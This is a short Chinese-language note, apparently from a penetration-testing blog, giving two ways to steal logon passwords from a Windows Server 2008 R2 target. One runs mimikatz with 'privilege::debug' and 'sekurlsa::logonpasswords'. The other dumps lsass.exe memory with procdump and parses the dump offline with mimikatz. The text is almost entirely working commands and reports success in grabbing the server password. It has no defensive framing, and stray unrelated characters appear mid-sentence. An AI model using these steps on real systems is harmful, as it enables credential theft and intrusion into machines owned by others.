目標(biāo)機(jī) windows server 2008 R2
第一種方法:
cmd下運(yùn)行mimikatz.exe岖圈,然后依次輸入下面命令
privilege::debug
sekurlsa::logonpasswords
成功抓到服務(wù)器密碼
第二種方法:
下載個(gè)procdump,https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump稿湿,然后
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonpasswords